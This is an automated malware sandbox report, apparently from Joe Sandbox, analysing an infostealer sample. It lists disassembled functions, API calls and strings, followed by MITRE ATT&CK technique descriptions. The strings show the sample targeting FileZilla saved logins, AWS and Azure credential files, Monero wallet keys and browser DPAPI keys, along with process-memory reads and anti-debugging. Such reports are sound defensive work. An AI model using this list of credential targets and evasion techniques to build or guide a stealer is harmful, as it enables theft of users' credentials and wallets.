Function 004178E0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6

Function 00401110 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699

Function 004010A0 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4

Non-executed Functions

Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
TerminateProcess.KERNEL32(00000000), ref: 0041BBE5

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D

Function 00410250 Relevance: 26.6, APIs: 3, Strings: 12, Instructions: 363stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041031B
memset.MSVCRT ref: 004106DD

Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903

strtok_s.MSVCRT ref: 00410679

Strings

url: , xrefs: 00410577
NA, xrefs: 004102CC, 004102F2, 004102CF, 004102F5
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004102A4
browser: FileZilla, xrefs: 00410559
profile: null, xrefs: 00410568
<Port>, xrefs: 004103C6
<Host>, xrefs: 0041037C
login: , xrefs: 004105CA
password: , xrefs: 004105FB
<Pass encoding="base64">, xrefs: 0041045A
NA, xrefs: 0041072E, 004106AF, 004106B2
<User>, xrefs: 00410410

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$mallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 2676359353-514892060
Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69

Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410C1C
lstrcatA.KERNEL32(?,00000000), ref: 00410C35
lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
lstrcatA.KERNEL32(?,00000000), ref: 00410C88
lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
lstrlenA.KERNEL32(?), ref: 00410CA7
memset.MSVCRT ref: 00410CCD
memset.MSVCRT ref: 00410CE1
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66

Strings

.exe, xrefs: 00410A95

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$CreateObjectProcessSingleWaitlstrlen
String ID: .exe
API String ID: 2214552867-4119554291
Opcode ID: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
Opcode Fuzzy Hash: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E

Function 00414D70 Relevance: 21.1, APIs: 4, Strings: 10, Instructions: 119COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414D87
memset.MSVCRT ref: 00414E13
memset.MSVCRT ref: 00414E9F
memset.MSVCRT ref: 00414F2B

Strings

Azure\.IdentityService, xrefs: 00414EEB
Azure\.azure, xrefs: 00414DD3
\.IdentityService\, xrefs: 00414ED9
*.*, xrefs: 00414DD8
\.aws\, xrefs: 00414E4D
msal.cache, xrefs: 00414EF0
Azure\.aws, xrefs: 00414E5F
\.azure\, xrefs: 00414DC1
zaA, xrefs: 00414DF1, 00414E7D, 00414F09, 00414F34, 00414DF4, 00414E80, 00414F0C
*.*, xrefs: 00414E64

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memset
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
API String ID: 2221118986-156832076
Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A

Function 004170D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
memset.MSVCRT ref: 0041716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
sA, xrefs: 004172AE, 00417179, 0041717C
sA, xrefs: 00417111

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcessmemset
String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 1606381396-2614523144
Opcode ID: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
Opcode Fuzzy Hash: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D

Function 004138B0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 250COMMON

Download Yara Rule

Strings

%s\%s, xrefs: 00413A6F
%s\*, xrefs: 004138C0
!=A, xrefs: 00413C82, 00413C45, 00413B69, 00413909, 00413B6C, 00413C48
%s\%s, xrefs: 0041397A
%s%s, xrefs: 00413AAD
%s\%s\%s, xrefs: 00413A4A

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 0-817767981
Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66

Function 00405960 Relevance: 11.0, APIs: 2, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
memcpy.MSVCRT(?), ref: 00405EFE

Strings

------, xrefs: 00405A96
------, xrefs: 00405D4C
", xrefs: 00405CD5
------, xrefs: 00405C0B
", xrefs: 00405E16

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$memcpy$CrackInternet
String ID: "$"$------$------$------
API String ID: 4271525049-2180234286
Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69

Function 00409E10 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F

memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
memset.MSVCRT ref: 00409EE8

Strings

v20, xrefs: 00409E21
ERROR_RUN_EXTRACTOR, xrefs: 00409E67
@, xrefs: 00409EF1
v10, xrefs: 00409EA3

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$memcmpmemset
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1976689032-1096346117
Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A

Function 00401310 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
.keys, xrefs: 0040136B
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memset
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2221118986-218353709
Opcode ID: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
Opcode Fuzzy Hash: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA

Function 004152C0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

strtok.MSVCRT(00000000,?), ref: 0041539E

Strings

ERROR, xrefs: 004154A9
ERROR, xrefs: 00415432
ERROR, xrefs: 0041530A
ERROR, xrefs: 004153B9
ERROR, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$ConnectHttpOpenRequestSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 632984754-1526165396
Opcode ID: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
Opcode Fuzzy Hash: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A

Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B39A

Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6

DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7

Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37

DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE

Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C9EA

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__amsg_exit.LIBCMT ref: 0041CA0A
__lock.LIBCMT ref: 0041CA1A
InterlockedDecrement.KERNEL32(?), ref: 0041CA37
free.MSVCRT ref: 0041CA4A
InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD

Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D

Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3

Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8

Strings

@, xrefs: 00416FA6

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5

Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C74E

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__getptd.LIBCMT ref: 0041C765
__amsg_exit.LIBCMT ref: 0041C773
__lock.LIBCMT ref: 0041C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C797

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E

Function 00418100 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00418172
__aulldiv.LIBCMT ref: 00418180

Strings

%d MB, xrefs: 004181A3
@, xrefs: 0041814D

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: %d MB$@
API String ID: 3732870572-3474575989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9

Function 00409CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6

Strings

"encrypted_key":", xrefs: 00409D30
, xrefs: 00409DC1
DPAPI, xrefs: 00409D89

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 1784268899-738592651
Opcode ID: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
Opcode Fuzzy Hash: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5

Function 004072D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407314
task.LIBCPMTD ref: 00407555

Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B

Strings

Password, xrefs: 00407401

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memsettaskvsprintf_s
String ID: Password
API String ID: 2675463923-3434357891
Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
